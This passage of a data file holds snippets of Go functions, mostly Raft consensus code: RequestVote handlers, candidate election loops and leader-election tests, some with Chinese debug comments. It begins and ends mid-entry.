1},\n\t\t\ttimes: []int{24, 29, 31, 76, 81},\n\t\t\tq: []int{28, 24, 29, 77, 30, 25, 76, 75, 81, 80},\n\t\t\ta: []int{0, 0, 1, 1, 1, 0, 1, 0, 1, 1},\n\t\t},\n\t}\n\tfor _, c := range cases {\n\t\tvote := Constructor(c.persons, c.times)\n\t\tfor i := 0; i < len(c.q); i++ {\n\t\t\tif vote.Q(c.q[i]) != c.a[i] {\n\t\t\t\tt.Fail()\n\t\t\t}\n\t\t}\n\t}\n}", "func testLeaderCycle(t *testing.T, preVote bool) {\n\tvar cfg func(*Config)\n\tif preVote {\n\t\tcfg = preVoteConfig\n\t}\n\tn := newNetworkWithConfig(cfg, nil, nil, nil)\n\tdefer n.closeAll()\n\tfor campaignerID := uint64(1); campaignerID <= 3; campaignerID++ {\n\t\tn.send(pb.Message{From: campaignerID, To: campaignerID, Type: pb.MsgHup})\n\n\t\tfor _, peer := range n.peers {\n\t\t\tsm := peer.(*raft)\n\t\t\tif sm.id == campaignerID && sm.state != StateLeader {\n\t\t\t\tt.Errorf(\"preVote=%v: campaigning node %d state = %v, want StateLeader\",\n\t\t\t\t\tpreVote, sm.id, sm.state)\n\t\t\t} else if sm.id != campaignerID && sm.state != StateFollower {\n\t\t\t\tt.Errorf(\"preVote=%v: after campaign of node %d, \"+\n\t\t\t\t\t\"node %d had state = %v, want StateFollower\",\n\t\t\t\t\tpreVote, campaignerID, sm.id, sm.state)\n\t\t\t}\n\t\t}\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\n\n\t//fmt.Printf(\"成功调用RequestVote!\\n\")\n\t// Your code here (2A, 2B).\n\t//rf.mu.Lock()\n\t//current_time:=time.Now().UnixNano()/1e6\n\t//&&current_time-rf.voted_time>800\n\trf.mu.Lock()\n\n\tif (rf.term>args.Candidate_term)&&((args.Last_log_term>rf.Last_log_term)||(args.Last_log_term==rf.Last_log_term&&args.Last_log_term_lenth>=rf.last_term_log_lenth)){\n\t\trf.term=args.Candidate_term\n\t\trf.state=0\n\t}\n\n\n\t/*\n\t\tif args.Append==true&&((args.Newest_log.Log_Term<rf.Last_log_term)||(args.Newest_log.Log_Term==rf.Last_log_term&&args.Last_log_term_lenth<rf.Last_log_term)){\n\t\t\treply.Term=args.Candidate_term+1\n\t\t\treply.Last_log_term=rf.Last_log_term\n\t\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\t\treply.Append_success=false\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t}\n\t*/\n\t//if args.Second==true{\n\t//\tfmt.Printf(\"!\\n!\\n!\\n!\\n!\\n编号为%d的raft实例收到编号为%d的leader的second请求!本机term是%d,leader term是%d,args.Append是%v\\n\",rf.me,args.From,rf.term,args.Candidate_term,args.Append)\n\t//}\n\n\tif rf.state==2&&((rf.term<args.Candidate_term)||(rf.term==args.Candidate_term&&args.Last_log_term<rf.Last_log_term))&&args.Votemsg==false{\n\t\t//fmt.Printf(\"分区恢复后编号为%d的raft实例的term是%d,发现自己已经不是leader!leader是%d,leader的term是%d\\n\",rf.me,rf.term,args.From,args.Candidate_term)\n\t\trf.state=0\n\t\trf.leaderID=args.From\n\t}\n\n\n\n\tif args.Candidate_term>=rf.term{\n\t\t//rf.term=args.Candidate_term\n\t\t//if args.Second==true{\n\t\t//\tfmt.Printf(\"服务器上的SECOND进入第一个大括号\\n\")\n\t\t//}\n\t\tif args.Append == false {\n\t\t\tif args.Votemsg == true && rf.voted[args.Candidate_term] == 0&&((args.Last_log_term>rf.Last_log_term)||(args.Last_log_term==rf.Last_log_term&&args.Last_log_term_lenth>=rf.last_term_log_lenth)) { //合法投票请求\n\t\t\t\t//fmt.Printf(\"编号为%d的raft实例对投票请求的回答为true,term统一更新为为%d\\n\",rf.me,rf.term)\n\n\t\t\t\t//rf.term = args.Candidate_term\n\t\t\t\trf.voted[args.Candidate_term] = 1\n\t\t\t\treply.Vote_sent = true\n\n\t\t\t\t//rf.voted_time=time.Now().UnixNano()/1e6\n\n\t\t\t}else if args.Votemsg==true{ //合法的纯heartbeat\n\t\t\t\tif rf.voted[args.Candidate_term]==1 {\n\t\t\t\t\treply.Voted = true\n\t\t\t\t}\n\t\t\t\t//fmt.Printf(\"请求方的term是%d,本机的term是%d,来自%d的投票请求被%d拒绝!rf.last_log_term是%d,rf.last_log_lenth是%d,本机的rf.last_log_term是%d,rf.last_log_lenth是%d\\n\",args.Candidate_term,rf.term,args.From,rf.me,args.Last_log_term,args.Last_log_term_lenth,rf.Last_log_term,rf.last_term_log_lenth)\n\t\t\t}\n\t\t\treply.Term=rf.term\n\n\t\t\t//rf.term=args.Candidate_term//!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\t\t\t//if args.Votemsg==true{//!!!!!!!!!!!!!!\n\t\t\t//\trf.term=args.Candidate_term//!!!!!!!!!!!!\n\t\t\t//}//!!!!!!!!!!!!!!!!!\n\n\t\t} else { //这条是关于日志的\n\t\t\t//这个请求是日志同步请求,接收方需要将自己的日志最后一条和leader发过来的声称的进行比较,如果leader的更新且leader的PREV和自己的LAST相同就接受\n\t\t\t//还得找到最后一个一致的日志位置,然后将后面的全部更新为和leader一致的,这意味着中间多次的RPC通信\n\n\t\t\t/*\n\t\t\tif args.Newest_log.Log_Term<rf.Last_log_term{\n\t\t\t\treply.Wrong_leader=true\n\t\t\t\treply.Term=rf.term\n\t\t\t\treply.Append_success=false\n\t\t\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\t\t\treturn\n\t\t\t}\n*/\n\n\t\t\tif (rf.Last_log_term>args.Last_log_term)||(rf.Last_log_term==args.Last_log_term&&rf.last_term_log_lenth>args.Last_log_term_lenth){\n\t\t\t\treply.Append_success=false\n\t\t\t\treply.Last_log_term=rf.Last_log_term\n\t\t\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\t\t\trf.mu.Unlock()\n\t\t\t\treturn\n\t\t\t}\n\n\n\t\t\trf.term=args.Candidate_term\n\t\t\tif args.Second==true{\n\t\t\t\t//\tfmt.Printf(\"在服务器端进入second阶段!\\n\")\n\t\t\t\trf.log=rf.log[:args.Second_position]\n\t\t\t\trf.log=append(rf.log,args.Second_log...)\n\t\t\t\treply.Append_success=true\n\t\t\t\trf.Last_log_term=args.Last_log_term\n\t\t\t\trf.last_term_log_lenth=args.Last_log_term_lenth\n\t\t\t\trf.Last_log_index=len(rf.log)-1\n\t\t\t\trf.Log_Term=args.Log_Term\n\t\t\t\t//fmt.Printf(\"Second APPend在服务器端成功!现在编号为%d的raft实例的log是%v, last_log_term是%d,term是%d\\n\",rf.me,rf.log,rf.Last_log_term,rf.term)\n\t\t\t}else{\n\t\t\t\tif args.Append_Try == false {//try用于表示是否是第一次append失败了现在正在沟通\n\t\t\t\t\trf.append_try_log_index = rf.Last_log_index\n\t\t\t\t\trf.append_try_log_term=rf.Last_log_term\n\t\t\t\t}\n\t\t\t\tif args.Prev_log_index != rf.append_try_log_index || args.Prev_log_term != rf.append_try_log_term{\n\t\t\t\t\t//fmt.Printf(\"匹配失败!!!%d号leader发过来的PREV_log_index是%d,本机%d的last_log_index是%d,PREV_term是%d,本机的last_log_term是%d!\\n\",args.From,args.Prev_log_index,rf.me,rf.append_try_log_index,args.Prev_log_term,rf.append_try_log_term)\n\t\t\t\t\treply.Vote_sent = false//匹配失败后进入双方沟通try\n\t\t\t\t\treply.Append_success = false\n\n\t\t\t\t\treply.Log_Term=rf.Log_Term\n\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t} else { //说明没问题。可以更新\n\t\t\t\t\t//fmt.Printf(\"匹配成功!!!%d号是leader,发过来的PREV_log_index是%d,本机的last_log_index是%d,PREV_term是%d,本机的last_log_term是%d,准备更新本机日志!!\\n\", args.From, args.Prev_log_index, rf.append_try_log_index, args.Prev_log_term, rf.append_try_log_term)\n\t\t\t\t\t//rf.Last_log_term = args.Last_log_term\n\t\t\t\t\trf.last_term_log_lenth=args.Last_log_term_lenth\n\t\t\t\t\trf.log = append(rf.log, args.Newest_log)\n\t\t\t\t\trf.Last_log_index += 1\n\t\t\t\t\trf.Log_Term = args.Log_Term\n\t\t\t\t\trf.Last_log_term=args.Newest_log.Log_Term\n\t\t\t\t\treply.Append_success = true\n\t\t\t\t\t//fmt.Printf(\"APPend成功,现在编号为%d的raft实例的log是%v,last_log_term是%d,term是%d\\n\",rf.me,rf.log,rf.Last_log_term,rf.term)\n\t\t\t\t}\n\t\t\t}\n\t\t\trf.log_added_content = args.Newest_log\n\t\t\trf.last_term_log_lenth=0\n\n\t\t\tfor cc:=len(rf.log)-1;cc>-1;cc--{\n\t\t\t\tif rf.log[cc].Log_Term!=rf.Last_log_term{\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\trf.last_term_log_lenth+=1\n\t\t\t}\n\n\n\t\t}\n\n\t\t//fmt.Printf(\"在更新heartbeat之前\\n\")\n\t\tif args.Votemsg==false {//加上个约束条件更严谨,加上了表示是在heartbeat开始之后认同了这个是leader,否则在投票阶段就认同了\n\t\t\t//fmt.Printf(\"rf.last_log_term %d, args.last_log_term %d\\n\",rf.Last_log_term,args.Last_log_term)\n\t\t\tif args.Last_log_term==rf.Last_log_term {//!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\t\t\t\tif args.Commit_MSG == true {\n\t\t\t\t\t//if len(rf.Log_Term)==len(args.Log_Term)&&rf.Log_Term[len(rf.Log_Term)-1]==args.Log_Term[len(args.Log_Term)-1]{\n\t\t\t\t\t//if len(args.Log_Term)==len(rf.Log_Term)&&args.Last_log_term==rf.Last_log_term {\n\t\t\t\t\tfor cc := rf.committed_index + 1; cc <= rf.Last_log_index; cc++ {\n\t\t\t\t\t\trf.committed_index = cc\n\t\t\t\t\t\t//!-------------------------fmt.Printf(\"在follower %d 上进行commit,commit_index是%d,commit的内容是%v,commit的term是%d,last_log_term是%d, rf.log是太长暂时鸽了\\n\", rf.me, cc, rf.log[cc].Log_Command, rf.log[cc].Log_Term, rf.Last_log_term)\n\t\t\t\t\t\trf.applych <- ApplyMsg{true, rf.log[rf.committed_index].Log_Command, rf.committed_index}\n\t\t\t\t\t}\n\n\t\t\t\t\treply.Commit_finished = true\n\t\t\t\t\t//}else{\n\t\t\t\t\t//}\n\t\t\t\t\t//}\n\t\t\t\t}\n\t\t\t}//!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n\t\t\trf.leaderID = args.From\n\t\t\trf.term = args.Candidate_term\n\t\t\trf.leaderID=args.From\n\n\n\t\t}\n\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\treply.Last_log_term=rf.Last_log_term\n\n\t\tif args.Votemsg==false {\n\t\t\tif rf.state == 0 {\n\t\t\t\trf.last_heartbeat <- 1\n\t\t\t}\n\t\t}\n\n\t}else{\n\t\t//fmt.Printf(\"term都不符,明显是非法的!\\n\")\n\t\treply.Vote_sent = false\n\t\treply.Append_success = false\n\t\treply.Term=rf.term\n\t\treply.Last_log_lenth=rf.last_term_log_lenth\n\t\treply.Last_log_term=rf.Last_log_term\n\t\t//-------------------if (args.Last_log_term>rf.Last_log_term)||(args.Last_log_term==rf.Last_log_term&&args.Last_log_term_lenth>=rf.last_term_log_lenth){\n\t\t//----------------------\treply.You_are_true=true\n\t\t//------------------------}\n\t}\n\trf.mu.Unlock()\n\t//fmt.Printf(\"编号为%d的raft实例通过RequestVote()收到了heartbeat\\n\",rf.me)\n\t//reply.voted<-true\n\t//rf.mu.Unlock()\n}", "func (s *ConsensusServiceImpl) RunLeaderElection(request *RunLeaderElectionRequestPB) (*RunLeaderElectionResponsePB, error) {\n\ts.Log.V(1).Info(\"sending RPC request\", \"service\", \"yb.consensus.ConsensusService\", \"method\", \"RunLeaderElection\", \"request\", request)\n\tresponse := &RunLeaderElectionResponsePB{}\n\n\terr := s.Messenger.SendMessage(\"yb.consensus.ConsensusService\", \"RunLeaderElection\", request.ProtoReflect().Interface(), response.ProtoReflect().Interface())\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\ts.Log.V(1).Info(\"received RPC response\", \"service\", \"yb.consensus.ConsensusService\", \"method\", \"RunLeaderElection\", \"response\", response)\n\n\treturn response, nil\n}", "func (s *raftServer) startElection() {\n\ts.setState(CANDIDATE)\n\tpeers := s.server.Peers()\n\ts.writeToLog(\"Number of peers: \" + strconv.Itoa(len(peers)))\n\tvotes := make(map[int]bool) // map to store received votes\n\tvotes[s.server.Pid()] = true\n\ts.voteFor(s.server.Pid(), s.Term())\n\tfor s.State() == CANDIDATE {\n\t\ts.incrTerm() // increment term for current\n\t\tcandidateTimeout := time.Duration(s.duration + s.rng.Int63n(RandomTimeoutRange)) // random timeout used by Raft authors\n\t\ts.sendRequestVote()\n\t\ts.writeToLog(\"Sent RequestVote message \" + strconv.Itoa(int(candidateTimeout)))\n\t\ts.eTimeout.Reset(candidateTimeout * time.Millisecond) // start re-election timer\n\t\tfor {\n\t\t\tacc := false\n\t\t\tselect {\n\t\t\tcase e, _ := <-s.server.Inbox():\n\t\t\t\t// received a message on server's inbox\n\t\t\t\tmsg := e.Msg\n\t\t\t\tif ae, ok := msg.(AppendEntry); ok { // AppendEntry\n\t\t\t\t\tacc = s.handleAppendEntry(e.Pid, &ae)\n\t\t\t\t} else if rv, ok := msg.(RequestVote); ok { // RequestVote\n\t\t\t\t\tacc = s.handleRequestVote(e.Pid, &rv)\n\n\t\t\t\t} else if grantV, ok := msg.(GrantVote); ok && grantV.VoteGranted {\n\t\t\t\t\tvotes[e.Pid] = true\n\t\t\t\t\ts.writeToLog(\"Received grantVote message from \" + strconv.Itoa(e.Pid) + \" with term #\" + strconv.Itoa(grantV.Term))\n\t\t\t\t\ts.writeToLog(\"Votes received so far \" + strconv.Itoa(len(votes)))\n\t\t\t\t\tif len(votes) == len(peers)/2+1 { // received majority votes\n\t\t\t\t\t\ts.setState(LEADER)\n\t\t\t\t\t\ts.sendHeartBeat()\n\t\t\t\t\t\tacc = true\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\tcase <-s.eTimeout.C:\n\t\t\t\t// received timeout on election timer\n\t\t\t\ts.writeToLog(\"Received re-election timeout\")\n\t\t\t\tacc = true\n\t\t\tdefault:\n\t\t\t\ttime.Sleep(1 * time.Millisecond) // sleep to avoid busy looping\n\t\t\t}\n\n\t\t\tif acc {\n\t\t\t\ts.eTimeout.Reset(candidateTimeout * time.Millisecond) // start re-election timer\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\n\t//defer rf.updateAppliedLock()\n\t//Your code here (2A, 2B).\n\tisALeader := rf.role == Leader\n\n\tif rf.updateTermLock(args.Term) && isALeader {\n\t\t//DPrintf(\"[DEBUG] Server %d from %d to Follower {requestVote : Term higher}\", rf.me, Leader)\n\t}\n\treply.VoteCranted = false\n\tvar votedFor interface{}\n\t//var isLeader bool\n\tvar candidateID, currentTerm, candidateTerm, currentLastLogIndex, candidateLastLogIndex, currentLastLogTerm, candidateLastLogTerm int\n\n\tcandidateID = args.CandidateID\n\tcandidateTerm = args.Term\n\tcandidateLastLogIndex = args.LastLogIndex\n\tcandidateLastLogTerm = args.LastLogTerm\n\n\trf.mu.Lock()\n\n\treply.Term = rf.currentTerm\n\tcurrentTerm = rf.currentTerm\n\tcurrentLastLogIndex = len(rf.logs) - 1 //TODO: fix the length corner case\n\tcurrentLastLogTerm = rf.logs[len(rf.logs)-1].Term\n\tvotedFor = rf.votedFor\n\tisFollower := rf.role == Follower\n\trf.mu.Unlock()\n\t//case 0 => I'm leader, so you must stop election\n\tif !isFollower {\n\t\tDPrintf(\"[DEBUG] Case0 I [%d] is Candidate than %d\", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\n\t//case 1 => the candidate is not suit to be voted\n\tif currentTerm > candidateTerm {\n\t\tDPrintf(\"[DEBUG] Case1 Follower %d > Candidate %d \", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\n\t//case 2 => the candidate's log is not lastest than the follwer\n\tif currentLastLogTerm > candidateLastLogTerm || (currentLastLogTerm == candidateLastLogTerm && currentLastLogIndex > candidateLastLogIndex) {\n\t\tDPrintf(\"[DEBUG] Case2 don't my[%d] newer than can[%d]\", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\trf.mu.Lock()\n\t//case3 => I have voted and is not you\n\tif votedFor != nil && votedFor != candidateID {\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\t//now I will vote you\n\n\tvar notFollower bool\n\trf.votedFor = candidateID\n\tif rf.role != Follower {\n\t\tnotFollower = true\n\t}\n\tDPrintf(\"[Vote] Server[%d] vote to Can[%d]\", rf.me, args.CandidateID)\n\trf.role = Follower\n\treply.VoteCranted = true\n\trf.mu.Unlock()\n\trf.persist()\n\tif notFollower {\n\t\trf.msgChan <- RecivedVoteRequest\n\t} else {\n\t\trf.msgChan <- RecivedVoteRequest\n\t}\n\n\treturn\n}", "func (rf *Raft) sendRequestVote(server int, args *RequestVoteArgs, reply *RequestVoteReply) bool {\n fmt.Printf(\"----> sendRequestProc: sendRequest to %d from %d\\n\", server, args.CandidateId)\n // Why is there no lock here? We are accessing a common variable.\n ok := rf.peers[server].Call(\"Raft.RequestVote\", args, reply)\n return ok\n}", "func TestNodeWithSmallerTermCanCompleteElection(t *testing.T) {\n\tn1 := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn2 := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tn3 := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\tdefer closeAndFreeRaft(n3)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\tn3.becomeFollower(1, None)\n\n\tn1.preVote = true\n\tn2.preVote = true\n\tn3.preVote = true\n\n\t// cause a network partition to isolate node 3\n\tnt := newNetwork(n1, n2, n3)\n\tnt.cut(1, 3)\n\tnt.cut(2, 3)\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tsm := nt.peers[1].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// check whether the term values are expected\n\t// a.Term == 3\n\t// b.Term == 3\n\t// c.Term == 1\n\tsm = nt.peers[1].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 1 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[2].(*raft)\n\tif sm.Term != 3 {\n\t\tt.Errorf(\"peer 2 term: %d, want %d\", sm.Term, 3)\n\t}\n\n\tsm = nt.peers[3].(*raft)\n\tif sm.Term != 1 {\n\t\tt.Errorf(\"peer 3 term: %d, want %d\", sm.Term, 1)\n\t}\n\n\t// check state\n\t// a == follower\n\t// b == leader\n\t// c == pre-candidate\n\tsm = nt.peers[1].(*raft)\n\tif sm.state != StateFollower {\n\t\tt.Errorf(\"peer 1 state: %s, want %s\", sm.state, StateFollower)\n\t}\n\tsm = nt.peers[2].(*raft)\n\tif sm.state != StateLeader {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", sm.state, StateLeader)\n\t}\n\tsm = nt.peers[3].(*raft)\n\tif sm.state != StatePreCandidate {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", sm.state, StatePreCandidate)\n\t}\n\n\tsm.logger.Infof(\"going to bring back peer 3 and kill peer 2\")\n\t// recover the network then immediately isolate b which is currently\n\t// the leader, this is to emulate the crash of b.\n\tnt.recover()\n\tnt.cut(2, 1)\n\tnt.cut(2, 3)\n\n\t// call for election\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// do we have a leader?\n\tsma := nt.peers[1].(*raft)\n\tsmb := nt.peers[3].(*raft)\n\tif sma.state != StateLeader && smb.state != StateLeader {\n\t\tt.Errorf(\"no leader\")\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n DPrintf(\"%d: %d recieve RequestVote from %d:%d\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate)\n // Your code here (2A, 2B).\n rf.mu.Lock()\n defer rf.mu.Unlock()\n if args.Term < rf.currentTerm {\n \n reply.VoteGranted = false\n reply.Term = rf.currentTerm\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n\n if args.Term > rf.currentTerm {\n rf.votedFor = -1\n rf.currentTerm = args.Term\n }\n\n if rf.votedFor == -1 || rf.votedFor == args.Candidate {\n // election restriction\n if args.LastLogTerm < rf.log[len(rf.log) - 1].Term ||\n (args.LastLogTerm == rf.log[len(rf.log) - 1].Term &&\n args.LastLogIndex < len(rf.log) - 1) {\n rf.votedFor = -1\n reply.VoteGranted = false\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n\n \n if rf.state == FOLLOWER {\n rf.heartbeat <- true\n }\n rf.state = FOLLOWER\n rf.resetTimeout()\n rf.votedFor = args.Candidate\n\n \n reply.VoteGranted = true\n reply.Term = args.Term\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n reply.VoteGranted = false\n reply.Term = args.Term\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n}", "func TestFreeStuckCandidateWithCheckQuorum(t *testing.T) {\n\ta := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tb := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tc := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(a)\n\tdefer closeAndFreeRaft(b)\n\tdefer closeAndFreeRaft(c)\n\n\ta.checkQuorum = true\n\tb.checkQuorum = true\n\tc.checkQuorum = true\n\n\tnt := newNetwork(a, b, c)\n\tsetRandomizedElectionTimeout(b, b.electionTimeout+1)\n\n\tfor i := 0; i < b.electionTimeout; i++ {\n\t\tb.tick()\n\t}\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(1)\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tif c.Term != b.Term+1 {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, b.Term+1)\n\t}\n\n\t// Vote again for safety\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tif c.Term != b.Term+2 {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, b.Term+2)\n\t}\n\n\tnt.recover()\n\tnt.send(pb.Message{From: 1, To: 3, Type: pb.MsgHeartbeat, Term: a.Term})\n\n\t// Disrupt the leader so that the stuck peer is freed\n\tif a.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateFollower)\n\t}\n\n\tif c.Term != a.Term {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, a.Term)\n\t}\n\n\t// Vote again, should become leader this time\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif c.state != StateLeader {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", c.state, StateLeader)\n\t}\n\n}", "func (r *Raft) runCandidate() {\n\t// Start vote for us, and set a timeout\n\tvoteCh := r.electSelf()\n\telectionTimeout := randomTimeout(r.conf.ElectionTimeout, 2*r.conf.ElectionTimeout)\n\n\t// Tally the votes, need a simple majority\n\tgrantedVotes := 0\n\tquorum := r.quorumSize()\n\tr.logD.Printf(\"Cluster size: %d, votes needed: %d\", len(r.peers)+1, quorum)\n\n\ttransition := false\n\tfor !transition {\n\t\tselect {\n\t\tcase rpc := <-r.rpcCh:\n\t\t\tswitch cmd := rpc.Command.(type) {\n\t\t\tcase *AppendEntriesRequest:\n\t\t\t\ttransition = r.appendEntries(rpc, cmd)\n\t\t\tcase *RequestVoteRequest:\n\t\t\t\ttransition = r.requestVote(rpc, cmd)\n\t\t\tdefault:\n\t\t\t\tr.logE.Printf(\"Candidate state, got unexpected command: %#v\",\n\t\t\t\t\trpc.Command)\n\t\t\t\trpc.Respond(nil, fmt.Errorf(\"unexpected command\"))\n\t\t\t}\n\n\t\t// Got response from peers on voting request\n\t\tcase vote := <-voteCh:\n\t\t\t// Check if the term is greater than ours, bail\n\t\t\tif vote.Term > r.getCurrentTerm() {\n\t\t\t\tr.logD.Printf(\"Newer term discovered\")\n\t\t\t\tr.setState(Follower)\n\t\t\t\tif err := r.setCurrentTerm(vote.Term); err != nil {\n\t\t\t\t\tr.logE.Printf(\"Failed to update current term: %w\", err)\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t// Check if the vote is granted\n\t\t\tif vote.Granted {\n\t\t\t\tgrantedVotes++\n\t\t\t\tr.logD.Printf(\"Vote granted. Tally: %d\", grantedVotes)\n\t\t\t}\n\n\t\t\t// Check if we've become the leader\n\t\t\tif grantedVotes >= quorum {\n\t\t\t\tr.logD.Printf(\"Election won. Tally: %d\", grantedVotes)\n\t\t\t\tr.setState(Leader)\n\t\t\t\treturn\n\t\t\t}\n\t\tcase a := <-r.applyCh:\n\t\t\t// Reject any operations since we are not the leader\n\t\t\ta.response = ErrNotLeader\n\t\t\ta.Response()\n\n\t\tcase <-electionTimeout:\n\t\t\t// Election failed! Restart the election. We simply return,\n\t\t\t// which will kick us back into runCandidate\n\t\t\tr.logW.Printf(\"Election timeout reached, restarting election\")\n\t\t\treturn\n\n\t\tcase <-r.shutdownCh:\n\t\t\treturn\n\t\t}\n\t}\n}", "func (r *Node) requestVotes(electionResults chan bool, fallbackChan chan bool, currTerm uint64) {\n\t// Votes received\n\tremaining := 0\n\tresultChan := make(chan RequestVoteResult)\n\tfor _, peer := range r.Peers {\n\t\tif r.Self.GetId() == peer.GetId() {\n\t\t\tcontinue\n\t\t}\n\t\tmsg := rpc.RequestVoteRequest{\n\t\t\tTerm: currTerm,\n\t\t\tCandidate: r.Self,\n\t\t\tLastLogIndex: r.LastLogIndex(),\n\t\t\tLastLogTerm: r.GetLog(r.LastLogIndex()).GetTermId(),\n\t\t}\n\t\tremaining++\n\t\tgo r.requestPeerVote(peer, &msg, resultChan)\n\t}\n\n\tvote := 1\n\treject := 0\n\tmajority := r.config.ClusterSize/2 + 1\n\tif vote >= majority {\n\t\telectionResults <- true\n\t\treturn\n\t}\n\tfor remaining > 0 {\n\t\trequestVoteResult := <-resultChan\n\t\tremaining--\n\t\tif requestVoteResult == RequestVoteFallback {\n\t\t\tfallbackChan <- true\n\t\t\treturn\n\t\t}\n\t\tif requestVoteResult == RequestVoteSuccess {\n\t\t\tvote++\n\t\t\tif vote >= majority {\n\t\t\t\telectionResults <- true\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\treject++\n\t\t\tif reject >= majority {\n\t\t\t\telectionResults <- false\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\tDPrintf(\"peer-%d gets a RequestVote RPC.\", rf.me)\n\t// Your code here (2A, 2B).\n\t// First, we need to detect obsolete information\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif args.Term < rf.currentTerm {\n\t\treply.VoteGranted = false\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\tstepdown := false\n\t// step down and convert to follower, adopt the args.Term\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\told_state := rf.state\n\t\trf.state = Follower\n\t\tif old_state == Leader {\n\t\t\trf.nonleaderCh <- true\n\t\t}\n\t\trf.votedFor = -1\n\t\trf.persist()\n\t\tstepdown = true\n\t}\n\n\t// 5.4.1 Election restriction : if the requester's log isn't more up-to-date than this peer's, don't vote for it.\n\t// check whether the requester's log is more up-to-date.(5.4.1 last paragraph)\n\tif len(rf.log) > 0 { // At first, there's no log entry in rf.log\n\t\tif rf.log[len(rf.log)-1].Term > args.LastLogTerm {\n\t\t\t// this peer's log is more up-to-date than requester's.\n\t\t\treply.VoteGranted = false\n\t\t\treply.Term = rf.currentTerm\n\t\t\treturn\n\t\t} else if rf.log[len(rf.log)-1].Term == args.LastLogTerm 